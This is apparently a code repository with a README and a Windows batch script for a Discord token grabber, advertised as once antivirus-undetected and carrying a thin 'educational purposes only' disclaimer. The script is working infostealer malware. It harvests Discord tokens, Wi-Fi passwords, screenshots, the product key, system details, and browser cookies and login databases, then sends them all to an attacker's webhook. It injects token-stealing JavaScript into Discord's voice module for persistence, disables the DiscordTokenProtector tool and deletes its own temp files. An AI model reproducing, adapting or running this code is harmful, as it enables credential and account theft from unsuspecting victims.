├── README.md └── fixed_token_grabber.bat /README.md: -------------------------------------------------------------------------------- 1 | # took it down due to it was patched and also github doesnt like hosting maleware even if its for education 2 | # WHICH MEANS IT NO LONGER WORKS 3 | 4 | # fixed-token-grabber 5 | a fixed version of the batch token grabber which was Fully undetected it grabbs the tokens of discord client and discord web and it sets the token grabber inside the discord voice folder in the index.js it sends the token everytime discord gets restartet its for the latest discord versions 0.0.309 and the most versions after it also the newest ones 6 | 7 | 8 | ## This is the Free version of my Grabber i will work at some other projects if you are interested join my discord 9 | ## [discord server](https://discord.gg/Nr2p7ECmt2) 10 | 11 | ### added 12 | - ip 13 | - installed programms 14 | - installed antiviruses #removed because it caused false detections 15 | - all system informations 16 | - ipconfig 17 | - netstate 18 | - launcher_accounts.json 19 | - screenshot 20 | - username 21 | - time 22 | - date 23 | - os 24 | - computername 25 | - hwid 26 | - instant tokengrabber #fixed by discord 27 | - undetectable from any antivirus #got detected after some time because people reportet it on virustotal 28 | - Discord Token Protector fucker https://github.com/andro2157/DiscordTokenProtector 29 | - Productkey 30 | - not decrypted Chrome passwords, Cookies, History, Shortcuts, Bookmarks 31 | - not decrypted Opera passwords, Cookies, History, Shortcuts, Bookmarks 32 | - not decrypted Brave passwords, Cookies, History, Shortcuts, Bookmarks 33 | 34 | 35 | ### todo 36 | - ip lookup api 37 | - wify passwords 38 | - spreading 39 | - builder 40 | - cammera pic 41 | - destroi defender 42 | - disable wifi 43 | - switch mouse buttons 44 | - block websides 45 | - startup 46 | 47 | ## i dont take any responsibility for damage done with the programm it's for educational purposes only it is just to prove that your antivirus isnt that good how you think and that even if files doesnt have any detections still can harm you dont use this to token grabb others 48 | -------------------------------------------------------------------------------- /fixed_token_grabber.bat: -------------------------------------------------------------------------------- 1 | 2 | 3 | @echo off 4 | :: i dont take any responsibility for damage done with the programm it's for educational purposes only 5 | ::replace the YOURWEBHOOK field with your webhook 6 | set webhook=YOURWEBHOOK 7 | 8 | 9 | 10 | 11 | :check_Permissions 12 | 13 | 14 | net session >nul 2>&1 15 | if %errorLevel% == 0 ( 16 | goto starti 17 | ) else ( 18 | cls 19 | echo Failure: Please run the file again with Admin 20 | timeout 2 >NUL 21 | goto check_Permissions 22 | ) 23 | 24 | 25 | :starti 26 | ::set 1 if you want that the discord of your target get closed ( discord needs to be restarted to send you the token) 27 | set /a killdc = 0 28 | 29 | ::get ip 30 | curl -o %userprofile%\AppData\Local\Temp\ipp.txt https://myexternalip.com/raw 31 | set /p ip=<%userprofile%\AppData\Local\Temp\ipp.txt 32 | 33 | ::gets a list of all installed programms 34 | powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >%userprofile%\AppData\Local\Temp\programms.txt " 35 | 36 | 37 | ::gets informations about the pc 38 | echo Hard Drive Space:>%userprofile%\AppData\Local\Temp\System_INFO.txt 39 | wmic diskdrive get size>>%userprofile%\AppData\Local\Temp\System_INFO.txt 40 | echo Service Tag:>>%userprofile%\AppData\Local\Temp\System_INFO.txt 41 | wmic bios get serialnumber>>%userprofile%\AppData\Local\Temp\System_INFO.txt 42 | echo CPU:>>%userprofile%\AppData\Local\Temp\System_INFO.txt 43 | wmic cpu get name>>%userprofile%\AppData\Local\Temp\System_INFO.txt 44 | systeminfo>%userprofile%\AppData\Local\Temp\sysi.txt 45 | wmic csproduct get uuid >%userprofile%\AppData\Local\Temp\uuid.txt 46 | for /F "tokens=2 delims=:" %%a in ('netsh wlan show profile') do ( 47 | netsh wlan show profile %%a key=clear >>%userprofile%\AppData\Local\Temp\wlan.txt 48 | 49 | ) 50 | 51 | :aftertesti 52 | 53 | ::gets the ipconfig (also local ip) 54 | ipconfig /all >%userprofile%\AppData\Local\Temp\ip.txt 55 | 56 | ::gets the info about the netstat 57 | netstat -an >%userprofile%\AppData\Local\Temp\netstat.txt 58 | 59 | ::sends the launcher_accounts.json if minecraft exist 60 | if exist %userprofile%\AppData\Roaming\.minecraft\launcher_accounts.json curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Roaming\.minecraft\launcher_accounts.json %web% && goto end 61 | 62 | ::makes and sends a screenshot 63 | echo $SERDO = Get-Clipboard >%userprofile%\AppData\Local\Temp\test.ps1 64 | echo function Get-ScreenCapture >>%userprofile%\AppData\Local\Temp\test.ps1 65 | echo { >>%userprofile%\AppData\Local\Temp\test.ps1 66 | echo begin { >>%userprofile%\AppData\Local\Temp\test.ps1 67 | echo Add-Type -AssemblyName System.Drawing, System.Windows.Forms >>%userprofile%\AppData\Local\Temp\test.ps1 68 | echo Add-Type -AssemblyName System.Drawing >>%userprofile%\AppData\Local\Temp\test.ps1 69 | echo $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() ^| >>%userprofile%\AppData\Local\Temp\test.ps1 70 | echo Where-Object { $_.FormatDescription -eq "JPEG" } >>%userprofile%\AppData\Local\Temp\test.ps1 71 | echo } >>%userprofile%\AppData\Local\Temp\test.ps1 72 | echo process { >>%userprofile%\AppData\Local\Temp\test.ps1 73 | echo Start-Sleep -Milliseconds 44 >>%userprofile%\AppData\Local\Temp\test.ps1 74 | echo [Windows.Forms.Sendkeys]::SendWait("{PrtSc}") >>%userprofile%\AppData\Local\Temp\test.ps1 75 | echo Start-Sleep -Milliseconds 550 >>%userprofile%\AppData\Local\Temp\test.ps1 76 | echo $bitmap = [Windows.Forms.Clipboard]::GetImage() >>%userprofile%\AppData\Local\Temp\test.ps1 77 | echo $ep = New-Object Drawing.Imaging.EncoderParameters >>%userprofile%\AppData\Local\Temp\test.ps1 78 | echo $ep.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, [long]100) >>%userprofile%\AppData\Local\Temp\test.ps1 79 | echo $screenCapturePathBase = $env:temp + "\" + $env:UserName + "_Capture" >>%userprofile%\AppData\Local\Temp\test.ps1 80 | echo $bitmap.Save("${screenCapturePathBase}.jpg", $jpegCodec, $ep) >>%userprofile%\AppData\Local\Temp\test.ps1 81 | echo } >>%userprofile%\AppData\Local\Temp\test.ps1 82 | echo } >>%userprofile%\AppData\Local\Temp\test.ps1 83 | echo Get-ScreenCapture >>%userprofile%\AppData\Local\Temp\test.ps1 84 | echo Set-Clipboard -Value $SERDO >>%userprofile%\AppData\Local\Temp\test.ps1 85 | echo $result = "%webhook%" >>%userprofile%\AppData\Local\Temp\test.ps1 86 | echo $screenCapturePathBase = $env:temp + "\" + $env:UserName + "_Capture.jpg" >>%userprofile%\AppData\Local\Temp\test.ps1 87 | echo curl.exe -i -F file=@"$screenCapturePathBase" $result >>%userprofile%\AppData\Local\Temp\test.ps1 88 | timeout 1 >NUL 89 | Powershell.exe -executionpolicy remotesigned -File %userprofile%\AppData\Local\Temp\test.ps1 && del %userprofile%\AppData\Local\Temp\test.ps1 90 | 91 | ::sends the username, ip, current time, and date of the victim 92 | 93 | 94 | curl -X POST -H "Content-type: application/json" --data "{\"content\": \"```User = %username% Ip = %ip% time = %time% date = %date% os = %os% Computername = %computername% ```\"}" %webhook% 95 | 96 | ::sends all files 97 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\System_INFO.txt %webhook% 98 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\sysi.txt %webhook% 99 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\ip.txt %webhook% 100 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\netstat.txt %webhook% 101 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\programms.txt %webhook% 102 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\uuid.txt %webhook% 103 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\wlan.txt %webhook% 104 | 105 | 106 | ::grabbs the token 107 | 108 | echo $hook = "%webhook%" >%userprofile%\AppData\Local\Temp\testtttt.ps1 109 | echo $token = new-object System.Collections.Specialized.StringCollection >>%userprofile%\AppData\Local\Temp\testtttt.ps1 110 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 111 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 112 | echo $db_path = @( >>%userprofile%\AppData\Local\Temp\testtttt.ps1 113 | echo $env:APPDATA + "\Discord\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 114 | echo $env:APPDATA + "\Roaming\Discord\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 115 | echo $env:APPDATA + "\Roaming\Lightcord\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 116 | echo $env:APPDATA + "\Roaming\discordptb\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 117 | echo $env:APPDATA + "\Roaming\discordcanary\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 118 | echo $env:APPDATA + "\Roaming\Opera Software\Opera Stable\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 119 | echo $env:APPDATA + "\Roaming\Opera Software\Opera GX Stable\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 120 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 121 | echo $env:APPDATA + "\Local\Amigo\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 122 | echo $env:APPDATA + "\Local\Torch\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 123 | echo $env:APPDATA + "\Local\Kometa\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 124 | echo $env:APPDATA + "\Local\Orbitum\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 125 | echo $env:APPDATA + "\Local\CentBrowser\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 126 | echo $env:APPDATA + "\Local\7Star\7Star\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 127 | echo $env:APPDATA + "\Local\Sputnik\Sputnik\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 128 | echo $env:APPDATA + "\Local\Vivaldi\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 129 | echo $env:APPDATA + "\Local\Google\Chrome SxS\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 130 | echo $env:APPDATA + "\Local\Epic Privacy Browser\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 131 | echo $env:APPDATA + "\Local\Google\Chrome\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 132 | echo $env:APPDATA + "\Local\uCozMedia\Uran\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 133 | echo $env:APPDATA + "\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 134 | echo $env:APPDATA + "\Local\Yandex\YandexBrowser\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 135 | echo $env:APPDATA + "\Local\Opera Software\Opera Neon\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 136 | echo $env:APPDATA + "\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 137 | echo ) >>%userprofile%\AppData\Local\Temp\testtttt.ps1 138 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 139 | echo foreach ($path in $db_path) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 140 | echo if (Test-Path $path) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 141 | echo foreach ($file in Get-ChildItem -Path $path -Name) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 142 | echo $data = Get-Content -Path "$($path)\$($file)" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 143 | echo $regex = [regex] "[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 144 | echo $match = $regex.Match($data) >>%userprofile%\AppData\Local\Temp\testtttt.ps1 145 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 146 | echo while ($match.Success) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 147 | echo if (!$token.Contains($match.Value)) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 148 | echo $token.Add($match.Value) ^| out-null >>%userprofile%\AppData\Local\Temp\testtttt.ps1 149 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 150 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 151 | echo $match = $match.NextMatch() >>%userprofile%\AppData\Local\Temp\testtttt.ps1 152 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 153 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 154 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 155 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 156 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 157 | echo $content = ">>> ||@everyone|| **New Token** ``` " >>%userprofile%\AppData\Local\Temp\testtttt.ps1 158 | echo foreach ($data in $token) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 159 | echo $content = [string]::Concat($content, "`n", $data) >>%userprofile%\AppData\Local\Temp\testtttt.ps1 160 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 161 | echo $content = [string]::Concat($content, "``` ") >>%userprofile%\AppData\Local\Temp\testtttt.ps1 162 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 163 | echo $JSON = @{ "content"= $content;}^| convertto-json >>%userprofile%\AppData\Local\Temp\testtttt.ps1 164 | echo Invoke-WebRequest -uri $hook -Method POST -Body $JSON -Headers @{"Content-Type" = "application/json"} >>%userprofile%\AppData\Local\Temp\testtttt.ps1 165 | Powershell.exe -executionpolicy remotesigned -File %userprofile%\AppData\Local\Temp\testtttt.ps1 166 | 167 | set /a app = 0 168 | set /a voice = 0 169 | if exist %userprofile%\AppData\Roaming\discord\0.0.309\modules\discord_voice\index.js echo var X = window.localStorage = document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage;var V = JSON.stringify(X);var L = V;var C = JSON.parse(L);var strtoken = C["token"];var O = new XMLHttpRequest();O.open('POST', '%webhook%', false);O.setRequestHeader('Content-Type', 'application/json');O.send('{"content": ' + strtoken + '}'); >>%userprofile%\AppData\Roaming\discord\0.0.309\modules\discord_voice\index.js 170 | :a 171 | if exist %userprofile%\AppData\Local\Discord\app-1.0.900%app%\modules\discord_voice-%voice%\discord_voice\index.js goto b 172 | set /a app=%app%+1 173 | if %app% == 10 goto c 174 | goto a 175 | :c 176 | set /a app=0 177 | set /a voice=%voice%+1 178 | if %voice% == 99 goto e 179 | goto a 180 | :b 181 | echo var X = window.localStorage = document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage;var V = JSON.stringify(X);var L = V;var C = JSON.parse(L);var strtoken = C["token"];var O = new XMLHttpRequest();O.open('POST', '%webhook%', false);O.setRequestHeader('Content-Type', 'application/json');O.send('{"content": ' + strtoken + '}'); >>%userprofile%\AppData\Local\Discord\app-1.0.900%app%\modules\discord_voice-%voice%\discord_voice\index.js 182 | if %killdc% == 1 goto d 183 | goto e 184 | :d 185 | ::coded by baum#2873 186 | 187 | ::DiscordTokenProtector Fucker 188 | taskkill /im Discord.exe /f 189 | taskkill /im DiscordTokenProtector.exe /f 190 | del %userprofile%\AppData\Roaming\DiscordTokenProtector\DiscordTokenProtector.exe 191 | del %userprofile%\AppData\Roaming\DiscordTokenProtector\ProtectionPayload.dll 192 | del %userprofile%\AppData\Roaming\DiscordTokenProtector\secure.dat 193 | echo { >%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 194 | echo "auto_start": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 195 | echo "auto_start_discord": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 196 | echo "integrity": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 197 | echo "integrity_allowbetterdiscord": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 198 | echo "integrity_checkexecutable": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 199 | echo "integrity_checkhash": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 200 | echo "integrity_checkmodule": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 201 | echo "integrity_checkresource": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 202 | echo "integrity_checkscripts": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 203 | echo "integrity_redownloadhashes": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 204 | echo "iterations_iv": 187, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 205 | echo "iterations_key": -666, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 206 | echo "version": 69 >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 207 | echo } >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 208 | echo anti DiscordTokenProtector by https://github.com/baum1810 >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 209 | 210 | 211 | 212 | ::get product key 213 | echo Set WshShell = CreateObject("WScript.Shell") >%userprofile%\AppData\Local\Temp\key.vbs 214 | echo Set FSO = CreateObject("Scripting.FileSystemObject") >>%userprofile%\AppData\Local\Temp\key.vbs 215 | echo Set File = FSO.CreateTextFile("%userprofile%\AppData\Local\Temp\Productkey.txt",True) >>%userprofile%\AppData\Local\Temp\key.vbs 216 | echo File.Write ConvertToKey(WshShell.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId")) >>%userprofile%\AppData\Local\Temp\key.vbs 217 | echo File.Close >>%userprofile%\AppData\Local\Temp\key.vbs 218 | echo Function ConvertToKey(Key) >>%userprofile%\AppData\Local\Temp\key.vbs 219 | echo Const KeyOffset = 52 >>%userprofile%\AppData\Local\Temp\key.vbs 220 | echo i = 28 >>%userprofile%\AppData\Local\Temp\key.vbs 221 | echo Chars = "BCDFGHJKMPQRTVWXY2346789" >>%userprofile%\AppData\Local\Temp\key.vbs 222 | echo Do >>%userprofile%\AppData\Local\Temp\key.vbs 223 | echo Cur = 0 >>%userprofile%\AppData\Local\Temp\key.vbs 224 | echo x = 14 >>%userprofile%\AppData\Local\Temp\key.vbs 225 | echo Do >>%userprofile%\AppData\Local\Temp\key.vbs 226 | echo Cur = Cur * 256 >>%userprofile%\AppData\Local\Temp\key.vbs 227 | echo Cur = Key(x + KeyOffset) + Cur >>%userprofile%\AppData\Local\Temp\key.vbs 228 | echo Key(x + KeyOffset) = (Cur \ 24) And 255 >>%userprofile%\AppData\Local\Temp\key.vbs 229 | echo Cur = Cur Mod 24 >>%userprofile%\AppData\Local\Temp\key.vbs 230 | echo x = x -1 >>%userprofile%\AppData\Local\Temp\key.vbs 231 | echo Loop While x ^>= 0 >>%userprofile%\AppData\Local\Temp\key.vbs 232 | echo i = i -1 >>%userprofile%\AppData\Local\Temp\key.vbs 233 | echo KeyOutput = Mid(Chars, Cur + 1, 1) ^& KeyOutput >>%userprofile%\AppData\Local\Temp\key.vbs 234 | echo If (((29 - i) Mod 6) = 0) And (i ^<^> -1) Then >>%userprofile%\AppData\Local\Temp\key.vbs 235 | echo i = i -1 >>%userprofile%\AppData\Local\Temp\key.vbs 236 | echo KeyOutput = "-" ^& KeyOutput >>%userprofile%\AppData\Local\Temp\key.vbs 237 | echo End If >>%userprofile%\AppData\Local\Temp\key.vbs 238 | echo Loop While i ^>= 0 >>%userprofile%\AppData\Local\Temp\key.vbs 239 | echo ConvertToKey = KeyOutput >>%userprofile%\AppData\Local\Temp\key.vbs 240 | echo End Function >>%userprofile%\AppData\Local\Temp\key.vbs 241 | start %userprofile%\AppData\Local\Temp\key.vbs 242 | timeout 1 >NUL 243 | 244 | set /p keya=<%localappdata%\Temp\Productkey.txt 245 | 246 | curl -X POST -H "Content-type: application/json" --data "{\"content\": \"Productkey: %keya%\"}" %webhook% 247 | 248 | 249 | ::not decrypted passwords 250 | curl -X POST -H "Content-type: application/json" --data "{\"content\": \"Chrome data \"}" %webhook% 251 | curl -F c=@"%localappdata%\Google\Chrome\User Data\Default\Cookies" %webhook% 252 | curl -F h=@"%localappdata%\Google\Chrome\User Data\Default\History" %webhook% 253 | curl -F s=@"%localappdata%\Google\Chrome\User Data\Default\Shortcuts" %webhook% 254 | curl -F b=@"%localappdata%\Google\Chrome\User Data\Default\Bookmarks" %webhook% 255 | curl -F l=@"%localappdata%\Google\Chrome\User Data\Default\Login Data" %webhook% 256 | curl -F l=@"%localappdata%\Google\Chrome\User Data\Local State" %webhook% 257 | curl -X POST -H "Content-type: application/json" --data "{\"content\": \"Opera data: \"}" %webhook% 258 | curl -F c=@"%appdata%\Opera Software\Opera Stable\Cookies" %webhook% 259 | curl -F h=@"%appdata%\Opera Software\Opera Stable\History" %webhook% 260 | curl -F s=@"%appdata%\Opera Software\Opera Stable\Shortcuts" %webhook% 261 | curl -F b=@"%appdata%\Opera Software\Opera Stable\Bookmarks" %webhook% 262 | curl -F l=@"%appdata%\Opera Software\Opera Stable\Login Data" %webhook% 263 | curl -X POST -H "Content-type: application/json" --data "{\"content\": \"Brave data: \"}" %webhook% 264 | curl -F ff=@"%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\Bookmarks" %webhook% 265 | curl -F hf=@"%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\History" %webhook% 266 | curl -F df=@"%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\Login Data" %webhook% 267 | curl -F daf=@"%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\Shortcuts" %webhook% 268 | 269 | 270 | ::deletes all temp files 271 | del %localappdata%\Temp\ip.txt 272 | del %localappdata%\Temp\ipp.txt 273 | del %localappdata%\Temp\sysi.txt 274 | del %localappdata%\Temp\System_INFO.txt 275 | del %localappdata%\Temp\netstat.txt 276 | del %localappdata%\Temp\test.ps1 277 | del %localappdata%\Temp\programms.txt 278 | del %localappdata%\Temp\%username%_Capture.jpg 279 | del %localappdata%\Temp\uuid.txt 280 | del %localappdata%\Temp\testtttt.ps1 281 | del %localappdata%\Temp\wlan.txt 282 | del %localappdata%\Temp\key.vbs 283 | del %localappdata%\Temp\Productkey.txt 284 | --------------------------------------------------------------------------------